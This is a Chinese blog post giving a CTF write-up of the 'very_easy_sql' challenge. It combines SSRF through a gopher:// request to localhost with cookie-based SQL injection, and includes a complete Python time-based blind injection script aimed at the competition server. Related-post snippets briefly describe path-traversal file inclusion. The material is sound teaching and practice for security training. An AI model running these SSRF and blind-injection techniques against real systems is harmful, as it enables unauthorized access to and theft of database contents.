[CTF/网络安全] 攻防世界 very_easy_sql 解题详析(gopher协议+ssrf漏洞sql注入+盲注脚本)

已于 2023-10-17 08:33:28 修改
阅读量7.2k 收藏 8
点赞数 2
分类专栏: 网络安全 # CTF赛题 # SQL注入攻击 文章标签: web安全 sql 网络 gopher协议 CTF
于 2023-08-01 23:05:21 首次发布
该原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。
本文链接:https://blog.csdn.net/2301_77485708/article/details/132034297
版权

姿势

在这里插入图片描述
登录处直接注入会提示you are not an inner user, so we can not let you have identify~

查看源代码发现use.php,访问后猜测该题为基于ssrf漏洞的sql注入:

在这里插入图片描述
先在登录处抓包判断注入参数:

在这里插入图片描述

不难判断注入点为cookie

因此我们可构造含有gopher协议的盲注脚本,通过对use.php界面发送请求来获取flag。具体实现的方法是通过构造不同的poc来进行注入攻击,并利用时间延迟判断是否成功注入。

gopher协议的相关知识点参考:

[网络安全] gopher协议原理、语法及利用总结

我们先构造一个gopher协议:

gopher://127.0.0.1:80/_GET /index.php HTTP/1.1
Host: localhost:80
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: this_is_your_cookie={bs};

将其进行URL编码后得到:

gopher://127.0.0.1:80/_GET%20%2findex.php%20HTTP%2f1.1%250d%250a
Host%3A%20localhost%3A80%250d%250a
Connection%3A%20close%250d%250a
Content-Type%3A%20application%2fx-www-form-urlencoded%250d%250a
Cookie%3A%20this%5Fis%5Fyour%5Fcookie%3D{bs}%3B%250d%250a

其中%0D 和 %0A 分别表示回车符和换行符

接着构造盲注脚本:

import requests
import time
import base64

url = "http://61.147.171.105:62477/use.php?url="
flag = ""
for pos in range(1, 50):
    for i in range(33, 127):

        poc = "') union select 1,2,if(ascii( substr((select * from flag)," + str(pos) + ",1) )=" + str(i) + ",sleep(2),1) # "
        #在每次循环中,首先构造了一个poc,使用联合查询来判断特定位置的字符是否符合条件。

        bs = str(base64.b64encode(poc.encode("utf-8")), "utf-8")
        final_poc = "gopher://127.0.0.1:80/_GET%20%2findex.php%20HTTP%2f1.1%250d%250aHost%3A%20localhost%3A80%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250aCookie%3A%20this%5Fis%5Fyour%5Fcookie%3D" + bs + "%3B%250d%250a"
        #然后将poc进行base64编码,并构造最终的请求URL。
        t1 = time.time()
        res = requests.get(url + final_poc)
        t2 = time.time()
        #接着,通过发送请求并计算时间延迟来判断是否成功注入。
        if (t2 - t1 > 2):
            flag += chr(i)
            print(flag)
            break
        #如果注入成功,就将满足条件的字符添加到flag中。
print(flag)
#然后,遍历每个位置和每个ASCII字符,进行注入攻击并逐步构建flag。

最终即可得到flag:

在这里插入图片描述

总结

以上为[CTF/网络安全] 攻防世界 very_easy_sql 解题详析,考察gopher协议、ssrf漏洞sql注入、盲注脚本等姿势及知识点,读者可躬身实践。

我是秋说,我们下次见。

秋说
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[ctf学习]ssrf-gopher
小飒的博客
07-05 722
?url=127.0.0.1/flag.php 看到 这里不考虑使用file直接读取 f.php内容,尝试一下如何使用gopher 进行get传值 burp拦截 取前两句 ssrf_post 还是上面情况,如果是post Content-Length: 7是post传参的长度
简易SQL----Easy
09-07
简单化SQL增删改查,支持Access数据库。 可复制粘贴字段,方便写SQL语句。
CTFHub技能树笔记之SSRF:POST请求、文件上传
weixin_48799157的博客
04-03 7682
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询框里过滤了,在url框里没有) 在使用union select时发现过滤关键字 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200313161718411.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpd
BUUCTF-EasySQL(sql注入题目)
m0_74167420的博客
03-10 358
为注释符,因而传入后台的是 select * from table_name where username='1' or 1=1 (因为1=1恒为真,所以SQL语句返回真值,成功绕过验证得到flag),则可返回真值。4、在该题目中,如果不匹配数据库也能返回真值那么就能绕过验证登录(万能用户名)。一般的,库验证登录注册查询数据会用到以下的句型,如果用户与密码匹配正确则返回。因为1=1恒为真,所以SQL语句返回真值,成功绕过验证得到flag。1、万能用户名/密码。2、在该题目中使用,
BUUCTFEasySQL [SUCTF 2019]
金 帛的博客
04-18 2784
BUUCTF的WP
攻防世界-web xff_Referer
m0_53533553的博客
09-11 1959
xff_Referer 扩展 xff Romote Address xff简称X-Forwarded-For X-Forwarded-For 是一个 HTTP 扩展头部,是用来识别通过HTTP代理,或,负载均衡方式,连接到Web服务器的客户端最原始的IP地址,的HTTP请求头字段。 主要是为了让 Web 服务器获取访问用户的真实 IP 地址。 那为什么 Web 服务器只有通过 X-Forwarded-For 头才能获取真实的 IP? Remote Address代表的是当前HTTP请求的远程地址,即HTTP
Web安全攻防世界08 very_easy_sql
weixin_42789937的博客
12-25 3016
Web安全攻防世界08 very_easy_sql,我也有点稀里糊涂,经过了多次失败,终于水了一篇混杂了30%的博文链接+60%的错误解法+文末10%官网wp的博文~
攻防世界 -- very_easy_sql
weixin_48031371的博客
09-14 7285
攻防世界 -- very_easy_sql
攻防世界web新手 - very_easy_sql(非常详细的wp)
yuanxu8877的博客
11-27 6518
攻防世界web新手 - very_easy_sql(非常详细的wp),希望大家不要吝啬您的点赞收藏哦。
【xctf之very_easy_sql
qq_40646572的博客
10-11 2498
题目如上,既然这道题的名称就是sql,那么就是让我们找到sql注入点。题目下面介绍说是签到题,我信了,然后我人麻了。。。我以为签到题可能就是注入点直接给我们了,然而并不是,这是一道较为复杂的题,起码对我来说是的。这道题包含gopher协议结合ssrf漏洞sql注入。首先,在页面上有两个输入框,进行尝试了下,发现不是注入点,然后我们看到请求返回包中,存在use.php提示,并且(后面我们发现此处存在一个大坑。)
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
CTF用的各种脚本,各类古典加解密的脚本,RSA常用脚本SQL盲注脚本,编码加解密神器
12-29
ctf web解题 找flag夺旗赛
ctf脚本_ctfpy脚本_ctf脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
网络安全攻防大赛ctf题目
03-09
网络安全攻防大赛ctf题目
pikachu靶场包含网络安全中常见的漏洞
11-08
pikachu靶场通关包含网络安全中常见的漏洞、XSS、SQL注入、目录遍历、文件上传、文件包含、远程执行等常见的漏洞都集成在此靶场的源码上!!
网络安全安全事件管理处置 — 安全事件处置思路指导
享你所想
04-26 718
一、处理DDOS事件 1.准备工作 2.预防工作 3.检测与分析 4.限制、消除 5.证据收集 二、处理恶意代码事件 1.准备 2.预防 3.检测与分析 4.限制 5.证据收集 6.消除与恢复 三、处理未授权访问事件 1.准备 2.预防 3.检测与分析 4.限制、消除 5.证据收集 6.恢复 四、处理复合型安全事件 1.建议
网络安全思考题
最新发布
weixin_62304542的博客
04-27 772
网络安全渗透思考题
网络安全与密码学--AES加密
weixin_61074128的博客
04-22 1060
1997年 NIST征集AES(Advanced Encryption Standard)2000年选中。AES分组长度为128位,密钥长度为128 192 256位。密钥长度 64位(实际使用56位 其中8位是奇偶校验位)python实现AES加密。分组加密之AES加密算法。DES 1977年被采用。
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏,祝你平安喜乐。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值